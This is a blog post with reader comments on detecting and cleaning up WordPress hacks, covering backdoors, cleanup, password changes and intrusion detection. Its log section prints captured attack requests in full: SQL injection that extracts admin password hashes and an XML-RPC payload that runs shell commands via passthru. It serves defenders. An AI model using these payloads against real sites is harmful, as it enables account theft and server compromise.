Did your WordPress site get hacked?

Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs? You did upgrade, didn’t you? No? Then it was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.

Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.

In the last week the hackers have started again. There is no zero-day WordPress exploit, and there is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog: those hits are instead being redirected to your-needs.info and anyresult.net.

If you’ve been hacked

  1. Upgrade to the latest version of WordPress.
  2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
  3. Change your passwords after upgrading and make sure the hacker didn’t create another user.
  4. Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key, or it won’t be very secret, will it?

    define('SECRET_KEY', '1234567890');

Hidden Code

The bad guys are using a number of ways to hide their hacks:

  • The simplest way is hiding their code in your PHP scripts. If your blog directory and files are writable by the webserver then a hacker has free rein to plant their code anywhere they like. wp-blog-header.php seems to be one place; theme files are another. When you upgrade WordPress your theme files won’t be overwritten, so make sure you double check those files for any strange code that uses the eval() command or base64_decode(). Here’s a code snippet taken from here:

    <?php

    Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.

  • Check your .htaccess file in the root of your blog. If you’ve never edited it, it should look like this:

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress

    That file may have this chunk of code too, which is to do with the uploader:

    <IfModule mod_security.c>
    <Files async-upload.php>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </Files>
    </IfModule>

  • They’re also uploading PHP code disguised as JPEG files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
    1. Open PHPMyAdmin and go to your blog’s options table and find the active_plugins record.
    2. Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again.
    3. Check your uploads directory for that jpg file and delete it.
    4. This YouTube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record, but it won’t hurt to do it.
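Step 2 above asks you to strip the planted entry out of the serialized active_plugins record without corrupting the array. This added Python example (not code from the post or from WordPress) parses the PHP-serialized array, drops entries that are not .php paths inside the plugins directory, and re-serializes it with correct string lengths and indices. The sample option value is constructed for illustration.

```python
import re

# Constructed sample active_plugins value: one real plugin plus a planted entry
# of the kind described above. PHP stores each string with its byte length.
SAMPLE_ACTIVE_PLUGINS = (
    'a:2:{i:0;s:19:"akismet/akismet.php";'
    'i:1;s:39:"../uploads/2008/05/04/jhjyahjhnjnva.jpg";}'
)
_ARRAY_HEAD = re.compile(r'^a:(\d+):\{')
_ENTRY = re.compile(r'i:(\d+);s:(\d+):"')


def parse_plugin_array(blob):
    """Parse a PHP-serialized array of strings (a:N:{i:0;s:LEN:"...";...}).

    Strings are length-prefixed, so slice by the declared length instead of
    searching for a closing quote. ASCII paths are assumed; PHP counts bytes."""
    head = _ARRAY_HEAD.match(blob)
    if not head:
        raise ValueError('not a serialized PHP array')
    count, pos, items = int(head.group(1)), head.end(), []
    for _ in range(count):
        entry = _ENTRY.match(blob, pos)
        if not entry:
            raise ValueError('malformed entry at offset %d' % pos)
        start, length = entry.end(), int(entry.group(2))
        if blob[start + length:start + length + 2] != '";':
            raise ValueError('declared length is wrong at offset %d' % start)
        items.append(blob[start:start + length])
        pos = start + length + 2
    if blob[pos:] != '}':
        raise ValueError('trailing data after the array')
    return items


def serialize_plugin_array(items):
    """Re-serialize as PHP does, renumbering from zero so the array stays
    consistent after entries are dropped."""
    body = ''.join('i:%d;s:%d:"%s";' % (i, len(v), v) for i, v in enumerate(items))
    return 'a:%d:{%s}' % (len(items), body)


def is_suspicious(path):
    """A genuine entry is a .php path relative to wp-content/plugins; anything
    under ../uploads/ or with an image extension has no business being active."""
    parts = path.split('/')
    return not path.endswith('.php') or '..' in parts or 'uploads' in parts


def clean_active_plugins(blob):
    """Return (cleaned serialized value, entries that were removed)."""
    items = parse_plugin_array(blob)
    removed = [p for p in items if is_suspicious(p)]
    kept = [p for p in items if not is_suspicious(p)]
    return serialize_plugin_array(kept), removed
```

Paste the value of the active_plugins record into clean_active_plugins() and write the first element of the result back; the second element lists what was dropped so you know which files to delete from the uploads directory.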

Change Your Passwords

Once you’ve upgraded and verified that your install is clean again you must do the following:

  1. Change the passwords of all users on your system.
  2. Make sure the hacker hasn’t added another user account he can use to login again.

Stop the bad guys

One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).

  • I use BackupPC to back up all my servers every night, and a simple MySQL backup script to dump the database daily.
  • The first IDS that springs to mind is Tripwire, but there are many others. I just installed AIDE to track changes on this server. It gives me a daily report on files that have changed in that period, so if a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo...):

    # apt-get install aide
    # vi /etc/aide/aide.conf.d/88_aide_web
    # /usr/sbin/aideinit

    In the configuration file above I put the following:

    /home/web/ Checksums
    !/home/www/logs/.*
    !/home/web/public_html/wp-content/cache/.*
    !/home/web/.*/htdocs/wp-content/cache/.*

    That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for its 5 minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out of date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:

<meta name="generator" content="WordPress 2.5.1" /> <!-- leave this for stats -->

What does a hack look like?

I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.

Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”, which strangely enough doesn’t show up on Google at all right now.

  1. First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
  2. Then he POSTs to wp-admin/admin-ajax.php with the following POST body:

    POST: Array
    (
    [cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
    )

  3. When that fails, he grabs xmlrpc.php.
  4. He then POSTs to that script, exploiting an old and long-fixed bug. Here’s a snippet of the data.

    HTTP_RAW_POST_DATA: <?xml version="1.0"?>
    <methodCall>
    <methodName>system.multicall</methodName>
    <params>
    <param><value><array><data>
    <value><struct>
    <member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>
    <member><name>params</name><value><array><data>
    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
    </data></array></value></member>

  5. That fails too so the query is repeated with similar SQL.

    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

  6. Then he tries a trackback:

    URL: /wp-trackback.php?tb_id=1
    POST: Array
    (
    [title] => 1
    [url] => 1
    [blog_name] => 1
    [tb_id] => 666666\'
    [1740009377] => 1
    [496546471] => 1
    )

  7. And another trackback:

    URL: /wp-trackback.php?p=1
    POST: Array
    (
    [url] => ekibastos
    [title] => ekibastos
    [excerpt] => ekibastos
    [blog_name] => +AFw-\')/*
    [charset] => UTF-7
    )

  8. Before finally going back to xmlrpc.php with this POST request:

    <?xml version="1.0"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>k1b0rg' icq: 76-86-20</string></value></param>
    <param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
    <param><value><string>admin</string></value></param>
    </params>
    </methodCall>

  9. In between, he also tries the following GET requests:

    GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
    GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1

  10. Thankfully I upgraded and all those attacks fail.

Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.
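As an added example (not from the original post), here is a small Python scanner that applies detection rules drawn from the sequence above to Apache combined-format access log lines: SQL injection tokens in the query string (decoded twice, because the post shows %2527), the k1b user agent, HEAD probes of wp-admin/post.php, and POSTs to xmlrpc.php or wp-trackback.php. It aggregates hits per client so that one ordinary xmlrpc.php POST does not alert on its own. The log lines and the 203.0.113.5 / 198.51.100.7 addresses are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Tokens from the injected cat= queries shown in the post (UNION SELECT ... FROM wp_users).
SQLI_RE = re.compile(r'union\s+(all\s+)?select|from\s+wp_users', re.I)


def parse_line(line):
    """Return the request fields as a dict, or None for a line we cannot parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def indicators(req):
    """Names of the rules one request trips, in a fixed order."""
    hits = []
    # Decode twice: %2527 becomes %27 and then the quote the injection relies on.
    path = unquote_plus(unquote_plus(req['path']))
    if SQLI_RE.search(path):
        hits.append('sqli_in_query')
    if 'k1b' in req['ua']:
        hits.append('k1b_user_agent')
    if req['method'] == 'HEAD' and path.startswith('/wp-admin/post.php'):
        hits.append('head_probe_post_php')
    if req['method'] == 'POST' and path.startswith(('/xmlrpc.php', '/wp-trackback.php')):
        hits.append('post_to_xmlrpc_or_trackback')
    return hits


def scan(lines, threshold=3):
    """Collect the distinct rules each client IP trips across the log and report
    IPs at or above `threshold`: the combination over several requests is what
    stands out, not any single POST to xmlrpc.php."""
    per_ip = defaultdict(set)
    for line in lines:
        req = parse_line(line)
        if req:
            per_ip[req['ip']].update(indicators(req))
    return {ip: sorted(rules) for ip, rules in per_ip.items() if len(rules) >= threshold}


# Constructed log lines; addresses come from the documentation ranges, not real attackers.
K1B_UA = 'Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)'
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2008:03:14:07 +0100] "HEAD /wp-admin/post.php HTTP/1.1" 302 - "-" "%s"' % K1B_UA,
    '203.0.113.5 - - [10/Jun/2008:03:14:09 +0100] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "%s"' % K1B_UA,
    '203.0.113.5 - - [10/Jun/2008:03:14:12 +0100] "GET /index.php?cat=%%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 8192 "-" "%s"' % K1B_UA,
    '198.51.100.7 - - [10/Jun/2008:03:15:00 +0100] "GET /?p=42 HTTP/1.1" 200 9031 "-" "Mozilla/5.0 (X11; Linux) Firefox/3.0"',
]
```

Feed scan() the lines of your real access log to get a dict of client addresses worth blocking or examining further.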

PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.

<?xml version="1.0"?>
<methodCall>
<methodName>test.method
</methodName>
<params>
<param>
<value><name>','')); echo
'______BEGIN______';
passthru('id');
echo
'_____FIM_____';
exit;/*</name></value>
</param>
</params>
</methodCall>

Edit: Tripwire url fixed, thanks Callum

PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.


387 Replies to “Did your WordPress site get hacked?”

  1. What an excellent and well written post.

    I’ve been vulnerable and paid the price in the past. Thanks to articles such as this one I hope I’m a bit better protected these days.

    But they are clever bastards and trying to keep ahead of them is hard sometimes. I wonder just how many people don’t have the time (or indeed the knowledge) to find out how to protect themselves properly.

    It’d be great if WordPress could publish info such as this right on the front page, so that it’s brought to people’s attention more easily.

    Anyway, as I say, great post. Thanks for spending the time putting it out there for the rest of us.

  2. Umm… WordPress 2.5.0 and 2.5.1 appear to be vulnerable to this attack. I’ve personally helped a couple of people that were taken down by this hack (the one that redirects to anyresults.net).

    Here is an example of someone dealing with it on 2.5.x:

    http://www.getrichslowly.org/blog/2008/06/08/patching-the-wordpress-anyresultsnet-hack/

    I’ve done some digging, and it appears to be pretty widespread. Lots of sites that I frequent are affected.

    The only other possibility that I can think of is that DreamHost has been compromised (I think many of these sites are on DH — could it be that they’ve gotten in and are attacking these installs from the inside?).

    1. Thank you much but I don’t even have a clue WHAT you said! Not computer or phone bright. My ex just stole my identity and I had to go bankrupt! Thanks again! Going to sleep.

  3. Thanks for the heads up on keymachine.de. I keep seeing that one on a regular basis and have been tempted to just ban the whole domain; now I will!

  4. Good post, but as far as I remember, there is also a way to hide code only in the database, so it would take some time to detect and find it.

  5. Great post, Donncha. Thanks for clarifying exactly how these hacks work and underlining the importance of upgrading to the latest versions as soon as they’re available!

  6. Thanks for the warning, someone contacted me regarding this issue of Google link redirecting and I thought it was an anomaly and asked them to check again. The second time she checked, the link directed to the correct page. Does that mean the hacked code somehow got overwritten? Or does the link redirection happens once in every “x” clicks or something to that order? The WP version is 2.5.1. Any input will be highly appreciated!

  7. fivecentnickel.com – I think there’s a good chance they were compromised before they upgraded. So many sites were hijacked the previous time the hackers activated their payload that there was bound to be a second wave.

    It’s probably worth double checking even if your site doesn’t exhibit any of the redirect problems. I know I grepped all my installs just in case.

  8. Very good tips. A hack can be hard to find, but my guess is you should always validate your feed.

    feedvalidator.org is a good tool you can use to take a look at what is being published and search for strange links, domains, etc.

  9. My blog got hacked. It makes me mad that the hackers can’t find a way to do something good with their skills rather than picking on innocent people.

    Thanks for a great post. I learned a lot!

  10. “That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.”

    and that’s exactly why cache should be outside of webroot, and almost everything else as well (plugins etc.), because guess where the next backdoor script is going to be placed..

    I host 9-10 WP blogs on a server, all running current. They have been hacked with 0day exploits 3 times in 6 months now. One of the blogs had so many pharma pages added to it that it was bringing the whole server to a crawl from the traffic.

  11. Here’s another tip: aside from checking file/directory permissions, make sure you don’t have obsolete JS directories/libraries lingering about. Much to my consternation I realized some “mysterious” pages were uploaded with an exploit of a JavaScript WYSIWYG (TinyMCE) editor. In my case, I did a full WP install refresh (just clearing out almost everything and uploaded a new set) as well as combing through all directories to find any suspect “additions” and that was the end of it.

  12. What’s the deal with the 2.3 and 2.5 branches of WordPress being plagued with security vulnerabilities??!! The older, (better, imo) WordPress 2.2.3 is not affected by any of the vulnerabilities discovered once these new versions were released.

    I believe this question deserves an answer from the WordPress developers. It’s as if security was completely thrown out the window with the release of 2.3.

  13. You are right, the xmlrpc.php exploit can be done easily with previous versions of WordPress; my blog was also attacked many times…
    However, the latest upgrade resolves the issues. Just a tip for other users: make sure that you block IPs through which attacks and spammers are coming; that will really help you.
    Regards,
    Himanshu

  14. I was hacked a few months ago… unfortunately for the hacker, I hadn’t started working on my site yet (still haven’t actually :P). Thankfully it was nothing more than a kiddie playing with his computer. 10 minutes on my FTP and my site was back to normal. I made sure to delete EVERY file that had been uploaded and/or modified the day the hack happened. That made cleanup REALLY easy if anyone ever has this happen to them. I even took a screenshot of my site hacked 😀

    http://img241.imageshack.us/img241/5268/fuckxa9.png

  15. Wow, thanks buddy, these tips really helped me a lot. I will now upgrade to the latest version whenever it’s out 🙂 Currently I’m on the latest version, but I didn’t upgrade for a long time until I noticed some bugs in the older version..
    Thanks again

  16. Thank you so much for this post. I upgraded to 2.5.1 the day it came out, but I’ve seen the attempts in WassUp and was not familiar with what they were trying to do, other than a vague suspicion it was probably malicious.

    I’ve heard from several other WP bloggers who’ve been hacked, and I will definitely be forwarding this post to them.

    Thanks again!

  17. Thank you SO MUCH for this article. I’ve definitely seen weird re-directs but I don’t know when they started since I rarely check my stats. Sigh. I don’t see any changed files and keep my server permissions rather tight (755 on directories and 644 on files) but something is wrong.

    At least with your article I have a starting point. I’m running 2.1.3 and got complacent….

  18. It only takes one time to learn. I got hacked two weeks ago before I upgraded and installed the security plugin. I haven’t had a problem since… just make sure you leave the scanner activated, and keep a lookout for WP upgrades. Doesn’t 2.6 come out soon?

  19. Don’t forget to check the database for cruft left by the attacker if they do get in.

    During the April attacks, I had cleaned up the files that had been compromised, but they still got back in a week or so later because some of the options had been tampered with, and a WordPress upgrade to 2.5 didn’t fix it.

    Actually viewing the tables was the only way to see the hidden user they’d created… there was no way to see it from inside the WP admin panels.

  20. I can’t find any files which have changed, and I’m hoping this is due to the permissions I have set, so I can only assume they made some database additions. I have no idea how to check that out but I’m off to see what I can find.

  21. OK, I’ve upgraded to 2.5.1. Thank you SO MUCH for this article. When I ran upgrade.php WP upgraded the database also. (shrug) I did find 2 users I didn’t know anything about and just deleted all my users, even my own id, leaving only admin and then changed the password.

    I hope that is enough and I don’t have to go into the database (scary).
